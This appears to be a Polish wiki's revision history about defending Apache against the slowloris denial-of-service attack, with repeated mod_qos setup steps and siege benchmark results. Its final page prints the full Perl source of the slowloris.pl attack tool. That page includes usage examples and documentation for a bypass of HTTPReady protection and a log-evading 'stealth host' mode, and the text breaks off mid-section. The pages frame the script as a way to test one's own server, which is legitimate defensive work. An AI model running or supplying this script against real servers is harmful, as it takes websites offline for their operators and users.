== Instalacja modułu wraz z konfiguracją zaprezentowana na [http://howtoforge.com/how-to-defend-slowloris-ddos-with-mod_qos-apache2-on-debian-lenny howtoforge] (tłumaczenie) ==

Pobranie, oraz wypakowanie

<pre>
cd /tmp/
wget http://sourceforge.net/projects/mod-qos/files/mod-qos/8.18/mod_qos-8.18-src.tar.gz/download
tar xvfz mod_qos-*
</pre>

Instalacja źródeł apache potrzebnych do kompilacji

<pre>
apt-get install apache2-threaded-dev gcc
</pre>

Kompilacja oraz instalacja
<pre>
cd mod_qos-8.13/apache2/
apxs2 -i -c mod_qos.c
</pre>

Konfiguracja
<pre>
cd /etc/apache2/mods-available/
nano qos.load
</pre>

Jako treść
<pre>
LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so
</pre>

<pre>
nano qos.conf
</pre>

Jako treść
<pre>
## QoS Settings
<IfModule mod_qos.c>
# handles connections from up to 100000 different IPs
QS_ClientEntries 100000
# will allow only 50 connections per IP
QS_SrvMaxConnPerIP 50
# maximum number of active TCP connections is limited to 256
MaxClients 256
# disables keep-alive when 70% of the TCP connections are occupied:
QS_SrvMaxConnClose 180
# minimum request/response speed (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything):
QS_SrvMinDataRate 150 1200
# and limit request header and body (carefull, that limits uploads and post requests too):
# LimitRequestFields 30
# QS_LimitRequestBody 102400
</IfModule>
</pre>

Uruchomienie

<pre>
a2enmod qos
/etc/init.d/apache2 restart
</pre>

Podgląd pracy można obserwować pod adresem
<pre>
http://ip_serwera/server-status
</pre>

== Test wpływu ataku slowloris na serwer Apache z zabezpieczeniami (limity w qos). ==

Serwer podlegający atakowi z zabezpieczeniami 300 jednoczesnych użytkowników.

<pre>
Lifting the server siege... done.
Transactions: 9902 hits
Availability: 100.00 %
Elapsed time: 60.11 secs
Data transferred: 47.94 MB
Response time: 0.29 secs
Transaction rate: 164.73 trans/sec
Throughput: 0.80 MB/sec
Concurrency: 47.74
Successful transactions: 5063
Failed transactions: 0
Longest transaction: 12.77
Shortest transaction: 0.00

</pre>

Ochrona przed atakiem slowloris (DoS nagłówków w Apache)

2009-10-01T16:28:10Z

Stare:

[[Plik:800px-Slow Loris Female.jpg|200px|thumb|right| Slow Loris]]

Atak pieszczotliwie nazywany slowloris należy do typów z grupy DoS.

Jego kluczowym celem jest zmuszenie serwera www do otwarcia jak największej liczby jednoczesnych połączeń z fikcyjnymi klientami które są generowane poprzez skrypt. Serwer otwiera gniazdo nasłuchujące ale nie otrzymuje od klienta pełnego zapytania, przez co połączenie nie może być zrealizowane. Serwer zakłada automatycznie że w najbliższym czasie klient dostarczy brakujące części więc gniazdo jest cały czas otwarte i zabiera zasoby serwera.

Całkowita blokada serwera następuje w momencie wykorzystania ustalonego odgórnie przez administratora limitu jednoczesnych połączeń.

Skrypt co chwilę prosi o kolejną porcję informacji, co powoduje ponowne otwarcie gniazd usuniętych jako nieużywane z powodu przekroczenia limitu czasu.

Atak ten pozwala na stosunkowo szybkie zablokowanie nawet bardzo potężnego serwera przy wykorzystaniu łącza o bardzo małej przepustowości.

Następującym skryptem wykonamy atak na swój serwer, oraz sprawdzimy skuteczność mechanizmów obronnych.
[[Slowloris.pl_(Skrypt)| Źródło skryptu oraz przykład użycia]]

Ochrona przed atakiem tego typu jest prawie niemożliwa przy zastosowaniu domyślnych funkcji wbudowanych w Apache.

Naszą linię obrony można rozgraniczyć na trzy grupy.

*1) Drastyczne zwiększenie liczby otwartych połączeń
*2) Twarde ograniczenie liczby jednoczesnych połączeń z jednego adresu IP.
*3) Zmniejszenie czasu żywotności otwartego połączenia

Co niosą za sobą powyższe metody?.
*1) Nic nie trwa wiecznie, ta metoda spowoduje tylko oddalenie punktu przepełnienia.
*2) Uderzy w rozległe sieci korporacyjne korzystające z technologii NAT (ucierpieć mogą niewinne osoby).
*3) Uderzy w osoby dysponujące słabym łączem, lub chwilowo przeciążonymi sieciami.

Najrozsądniejszym rozwiązaniem jest instalacja modułu mod-qos który pozwala na ścisłe kontrolowanie przepływam zapytań kierowanych na nasz serwer.

Dawniej był on instalowany w celu ograniczenia transferu, dzisiaj zyskał nowe kluczowe znaczenie.

== Test wpływu ataku slowloris na serwer Apache bez zabezpieczeń. ==

Serwer nie podlegający atakowi bez zabezpieczeń 300 jednoczesnych użytkowników.

<pre>
Lifting the server siege... done.
Transactions: 5756 hits
Availability: 99.71 %
Elapsed time: 59.69 secs
Data transferred: 45.79 MB
Response time: 1.46 secs
Transaction rate: 96.43 trans/sec
Throughput: 0.77 MB/sec
Concurrency: 141.06
Successful transactions: 5755
Failed transactions: 17
Longest transaction: 29.90
Shortest transaction: 0.00
</pre>

Ten sam serwer, po kilkunastu minutach pracy skryptu slowloris.
<pre>
done.
Transactions: 0 hits
Availability: 0.00 %
Elapsed time: 60.22 secs
Data transferred: 0.00 MB
Response time: 0.00 secs
Transaction rate: 0.00 trans/sec
Throughput: 0.00 MB/sec
Concurrency: 0.00
Successful transactions: 0
Failed transactions: 304
Longest transaction: 0.00
Shortest transaction: 0.00
</pre>

Wniosek: Całkowita odmowa świadczenia usług.

Instalacja modułu wraz z konfiguracją zaprezentowana na [http://howtoforge.com/how-to-defend-slowloris-ddos-with-mod_qos-apache2-on-debian-lenny Opis na HowToForge]

Pobranie, oraz wypakowanie

<pre>
cd /tmp/
wget http://sourceforge.net/projects/mod-qos/files/mod-qos/8.18/mod_qos-8.18-src.tar.gz/download
tar xvfz mod_qos-*
</pre>

Instalacja źródeł apache potrzebnych do kompilacji

<pre>
apt-get install apache2-threaded-dev gcc
</pre>

Kompilacja oraz instalacja
<pre>
cd mod_qos-8.13/apache2/
apxs2 -i -c mod_qos.c
</pre>

Konfiguracja
<pre>
cd /etc/apache2/mods-available/
nano qos.load
</pre>

Jako treść
<pre>
LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so
</pre>

<pre>
nano qos.conf
</pre>

Jako treść
<pre>
## QoS Settings
<IfModule mod_qos.c>
# handles connections from up to 100000 different IPs
QS_ClientEntries 100000
# will allow only 50 connections per IP
QS_SrvMaxConnPerIP 50
# maximum number of active TCP connections is limited to 256
MaxClients 256
# disables keep-alive when 70% of the TCP connections are occupied:
QS_SrvMaxConnClose 180
# minimum request/response speed (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything):
QS_SrvMinDataRate 150 1200
# and limit request header and body (carefull, that limits uploads and post requests too):
# LimitRequestFields 30
# QS_LimitRequestBody 102400
</IfModule>
</pre>

Uruchomienie

<pre>
a2enmod qos
/etc/init.d/apache2 restart
</pre>

Podgląd pracy można obserwować pod adresem
<pre>
http://ip_serwera/server-status
</pre>

== Test wpływu ataku slowloris na serwer Apache z zabezpieczeniami (limity w qos). ==

Serwer podlegający atakowi z zabezpieczeniami 300 jednoczesnych użytkowników.

<pre>
Lifting the server siege... done.
Transactions: 9902 hits
Availability: 100.00 %
Elapsed time: 60.11 secs
Data transferred: 47.94 MB
Response time: 0.29 secs
Transaction rate: 164.73 trans/sec
Throughput: 0.80 MB/sec
Concurrency: 47.74
Successful transactions: 5063
Failed transactions: 0
Longest transaction: 12.77
Shortest transaction: 0.00

</pre>

Ochrona przed atakiem slowloris (DoS nagłówków w Apache)

2009-10-01T15:50:30Z

Stare:

[[Plik:800px-Slow Loris Female.jpg|200px|thumb|right| Slow Loris]]

Atak pieszczotliwie nazywany slowloris należy do typów z grupy DoS.

Jego kluczowym celem jest zmuszenie serwera www do otwarcia jak największej liczby jednoczesnych połączeń z fikcyjnymi klientami które są generowane poprzez skrypt. Serwer otwiera gniazdo nasłuchujące ale nie otrzymuje od klienta pełnego zapytania, przez co połączenie nie może być zrealizowane. Serwer zakłada automatycznie że w najbliższym czasie klient dostarczy brakujące części więc gniazdo jest cały czas otwarte i zabiera zasoby serwera.

Całkowita blokada serwera następuje w momencie wykorzystania ustalonego odgórnie przez administratora limitu jednoczesnych połączeń.

Skrypt co chwilę prosi o kolejną porcję informacji, co powoduje ponowne otwarcie gniazd usuniętych jako nieużywane z powodu przekroczenia limitu czasu.

Atak ten pozwala na stosunkowo szybkie zablokowanie nawet bardzo potężnego serwera przy wykorzystaniu łącza o bardzo małej przepustowości.

Następującym skryptem wykonamy atak na swój serwer, oraz sprawdzimy skuteczność mechanizmów obronnych.
[[Slowloris.pl_(Skrypt)| Źródło skryptu oraz przykład użycia]]

Ochrona przed atakiem tego typu jest prawie niemożliwa przy zastosowaniu domyślnych funkcji wbudowanych w Apache.

Naszą linię obrony można rozgraniczyć na trzy grupy.

*1) Drastyczne zwiększenie liczby otwartych połączeń
*2) Twarde ograniczenie liczby jednoczesnych połączeń z jednego adresu IP.
*3) Zmniejszenie czasu żywotności otwartego połączenia

Co niosą za sobą powyższe metody?.
*1) Nic nie trwa wiecznie, ta metoda spowoduje tylko oddalenie punktu przepełnienia.
*2) Uderzy w rozległe sieci korporacyjne korzystające z technologii NAT (ucierpieć mogą niewinne osoby).
*3) Uderzy w osoby dysponujące słabym łączem, lub chwilowo przeciążonymi sieciami.

Najrozsądniejszym rozwiązaniem jest instalacja modułu mod-qos który pozwala na ścisłe kontrolowanie przepływam zapytań kierowanych na nasz serwer.

Dawniej był on instalowany w celu ograniczenia transferu, dzisiaj zyskał nowe kluczowe znaczenie.

== Test wpływu ataku slowloris na serwer Apache bez zabezpieczeń. ==

Serwer nie podlegający atakowi bez zabezpieczeń 300 jednoczesnych użytkowników.

<pre>
Lifting the server siege... done.
Transactions: 5756 hits
Availability: 99.71 %
Elapsed time: 59.69 secs
Data transferred: 45.79 MB
Response time: 1.46 secs
Transaction rate: 96.43 trans/sec
Throughput: 0.77 MB/sec
Concurrency: 141.06
Successful transactions: 5755
Failed transactions: 17
Longest transaction: 29.90
Shortest transaction: 0.00
</pre>

Ten sam serwer, po kilkunastu minutach pracy skryptu slowloris.
<pre>
done.
Transactions: 0 hits
Availability: 0.00 %
Elapsed time: 60.22 secs
Data transferred: 0.00 MB
Response time: 0.00 secs
Transaction rate: 0.00 trans/sec
Throughput: 0.00 MB/sec
Concurrency: 0.00
Successful transactions: 0
Failed transactions: 304
Longest transaction: 0.00
Shortest transaction: 0.00
</pre>

Wniosek: Całkowita odmowa świadczenia usług.

Instalacja modułu wraz z konfiguracją zaprezentowana na [http://howtoforge.com/how-to-defend-slowloris-ddos-with-mod_qos-apache2-on-debian-lenny Opis na HowToForge]

Pobranie, oraz wypakowanie

<pre>
cd /tmp/
wget http://sourceforge.net/projects/mod-qos/files/mod-qos/8.18/mod_qos-8.18-src.tar.gz/download
tar xvfz mod_qos-*
</pre>

Instalacja źródeł apache potrzebnych do kompilacji

<pre>
apt-get install apache2-threaded-dev gcc
</pre>

Kompilacja oraz instalacja
<pre>
cd mod_qos-8.13/apache2/
apxs2 -i -c mod_qos.c
</pre>

Konfiguracja
<pre>
cd /etc/apache2/mods-available/
nano qos.load
</pre>

Jako treść
<pre>
LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so
</pre>

<pre>
nano qos.conf
</pre>

Jako treść
<pre>
## QoS Settings
<IfModule mod_qos.c>
# handles connections from up to 100000 different IPs
QS_ClientEntries 100000
# will allow only 50 connections per IP
QS_SrvMaxConnPerIP 50
# maximum number of active TCP connections is limited to 256
MaxClients 256
# disables keep-alive when 70% of the TCP connections are occupied:
QS_SrvMaxConnClose 180
# minimum request/response speed (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything):
QS_SrvMinDataRate 150 1200
# and limit request header and body (carefull, that limits uploads and post requests too):
# LimitRequestFields 30
# QS_LimitRequestBody 102400
</IfModule>
</pre>

Uruchomienie

<pre>
a2enmod qos
/etc/init.d/apache2 restart
</pre>

Podgląd pracy można obserwować pod adresem
<pre>
http://ip_serwera/server-status
</pre>

Ochrona przed atakiem slowloris (DoS nagłówków w Apache)

2009-10-01T15:15:38Z

Stare:

[[Plik:800px-Slow Loris Female.jpg|200px|thumb|right| Slow Loris]]

Atak pieszczotliwie nazywany slowloris należy do typów z grupy DoS.

Jego kluczowym celem jest zmuszenie serwera www do otwarcia jak największej liczby jednoczesnych połączeń z fikcyjnymi klientami które są generowane poprzez skrypt. Serwer otwiera gniazdo nasłuchujące ale nie otrzymuje od klienta pełnego zapytania, przez co połączenie nie może być zrealizowane. Serwer zakłada automatycznie że w najbliższym czasie klient dostarczy brakujące części więc gniazdo jest cały czas otwarte i zabiera zasoby serwera.

Całkowita blokada serwera następuje w momencie wykorzystania ustalonego odgórnie przez administratora limitu jednoczesnych połączeń.

Skrypt co chwilę prosi o kolejną porcję informacji, co powoduje ponowne otwarcie gniazd usuniętych jako nieużywane z powodu przekroczenia limitu czasu.

Atak ten pozwala na stosunkowo szybkie zablokowanie nawet bardzo potężnego serwera przy wykorzystaniu łącza o bardzo małej przepustowości.

Następującym skryptem wykonamy atak na swój serwer, oraz sprawdzimy skuteczność mechanizmów obronnych.
[[Slowloris.pl_(Skrypt)| Źródło skryptu oraz przykład użycia]]

Ochrona przed atakiem tego typu jest prawie niemożliwa przy zastosowaniu domyślnych funkcji wbudowanych w Apache.

Naszą linię obrony można rozgraniczyć na trzy grupy.

*1) Drastyczne zwiększenie liczby otwartych połączeń
*2) Twarde ograniczenie liczby jednoczesnych połączeń z jednego adresu IP.
*3) Zmniejszenie czasu żywotności otwartego połączenia

Co niosą za sobą powyższe metody?.
*1) Nic nie trwa wiecznie, ta metoda spowoduje tylko oddalenie punktu przepełnienia.
*2) Uderzy w rozległe sieci korporacyjne korzystające z technologii NAT (ucierpieć mogą niewinne osoby).
*3) Uderzy w osoby dysponujące słabym łączem, lub chwilowo przeciążonymi sieciami.

Najrozsądniejszym rozwiązaniem jest instalacja modułu mod-qos który pozwala na ścisłe kontrolowanie przepływam zapytań kierowanych na nasz serwer.

Dawniej był on instalowany w celu ograniczenia transferu, dzisiaj zyskał nowe kluczowe znaczenie.

== Test wpływu ataku slowloris na serwer Apache bez zabezpieczeń. ==

Serwer nie podlegający atakowi bez zabezpieczeń 300 jednoczesnych użytkowników.

<pre>
Lifting the server siege... done.
Transactions: 5756 hits
Availability: 99.71 %
Elapsed time: 59.69 secs
Data transferred: 45.79 MB
Response time: 1.46 secs
Transaction rate: 96.43 trans/sec
Throughput: 0.77 MB/sec
Concurrency: 141.06
Successful transactions: 5755
Failed transactions: 17
Longest transaction: 29.90
Shortest transaction: 0.00
</pre>

Ten sam serwer, po kilkunastu minutach pracy skryptu slowloris.
<pre>
done.
Transactions: 0 hits
Availability: 0.00 %
Elapsed time: 60.22 secs
Data transferred: 0.00 MB
Response time: 0.00 secs
Transaction rate: 0.00 trans/sec
Throughput: 0.00 MB/sec
Concurrency: 0.00
Successful transactions: 0
Failed transactions: 304
Longest transaction: 0.00
Shortest transaction: 0.00
</pre>

Wniosek: Całkowita odmowa świadczenia usług.

Instalacja modułu wraz z konfiguracją zaprezentowana na [http://howtoforge.com/how-to-defend-slowloris-ddos-with-mod_qos-apache2-on-debian-lenny Opis na HowToForge]

Pobranie, oraz wypakowanie

<pre>
cd /tmp/
wget http://sourceforge.net/projects/mod-qos/files/mod-qos/8.18/mod_qos-8.18-src.tar.gz/download
tar xvfz mod_qos-*
</pre>

Instalacja źródeł apache potrzebnych do kompilacji

<pre>
apt-get install apache2-threaded-dev gcc
</pre>

Kompilacja oraz instalacja
<pre>
cd mod_qos-8.13/apache2/
apxs2 -i -c mod_qos.c
</pre>

Konfiguracja
<pre>
cd /etc/apache2/mods-available/
nano qos.load
</pre>

Jako treść
<pre>
LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so
</pre>

<pre>
nano qos.conf
</pre>

Jako treść
<pre>
## QoS Settings
<IfModule mod_qos.c>
# handles connections from up to 100000 different IPs
QS_ClientEntries 100000
# will allow only 50 connections per IP
QS_SrvMaxConnPerIP 50
# maximum number of active TCP connections is limited to 256
MaxClients 256
# disables keep-alive when 70% of the TCP connections are occupied:
QS_SrvMaxConnClose 180
# minimum request/response speed (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything):
QS_SrvMinDataRate 150 1200
# and limit request header and body (carefull, that limits uploads and post requests too):
# LimitRequestFields 30
# QS_LimitRequestBody 102400
</IfModule>
</pre>

Uruchomienie

<pre>
a2enmod qos
/etc/init.d/apache2 restart
</pre>

Slowloris.pl (Skrypt)

2009-10-01T14:56:19Z

Stare:

Kompletne źródło skryptu perl służącego do przeprowadzenia ataku DoS na serwery Apache.

Wymagane do zainstalowania moduły
<pre>
perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'
</pre>

Przykładowe użycie

<pre>
perl slowloris.pl -dns www.strona.pl
</pre>

Kod źródłowy skryptu slowloris.pl
<source lang="perl">
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;

$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors

print <<EOTEXT;
�[1m
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
. . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
. .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
. . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco
�[31m
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
�[m
EOTEXT

my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
'shost=s' => \$shost,
'dns=s' => \$host,
'httpready' => \$httpready,
'num=i' => \$connections,
'cache' => \$cache,
'port=i' => \$port,
'https' => \$ssl,
'tcpto=i' => \$tcpto,
'test' => \$test,
'timeout=i' => \$timeout,
'version' => \$version,
);

if ($version) {
print "Version 0.7\n";
exit;
}

unless ($host) {
print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
print "\n\tType 'perldoc $0' for help with options.\n\n";
exit;
}

unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}

unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}

unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}

my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Slowloris will be slower than normal as a result.\n";
}

my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;

srand() if ($cache);

if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($httpready) {
$method = "POST";
}
else {
$method = "GET";
}

if ($test) {
my @times = ( "2", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "This test could take up to $totaltime minutes.\n";

my $delay = 0;
my $working = 0;
my $sock;

if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now comes the waiting game...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}

if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Slowloris closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Slowloris against this target. You can
tweak the -timeout flag down to less than 10 seconds but it still may not
build the sockets in time.
EOSUCKS2BU
}
}
else {
print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";

if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}

sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
sleep($timeout);
}
}

sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}

__END__

=head1 TITLE

Slowloris

=head1 VERSION

Version 0.7 Beta

=head1 DATE

06/17/2009

=head1 AUTHOR

RSnake <h@ckers.org> with threading from John Kinsella

=head1 ABSTRACT

Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.

=head1 AFFECTS

Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?

=head1 NOT AFFECTED

IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?

=head1 DESCRIPTION

Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.

As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.

=head2 Testing

If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:

=head3 Testing Example:

./slowloris.pl -dns www.example.com -port 80 -test

This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).

=head2 HTTP DoS

Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.

=head3 HTTP DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5

=head2 HTTPReady Bypass

HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.

=head3 HTTPReady Bypass Example

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready

=head2 Stealth Host DoS

If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.

=head3 Stealth Host DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com

=head2 HTTPS DoS

Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.

=head3 HTTPS DoS Example:

./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https

=head2 HTTP Cache

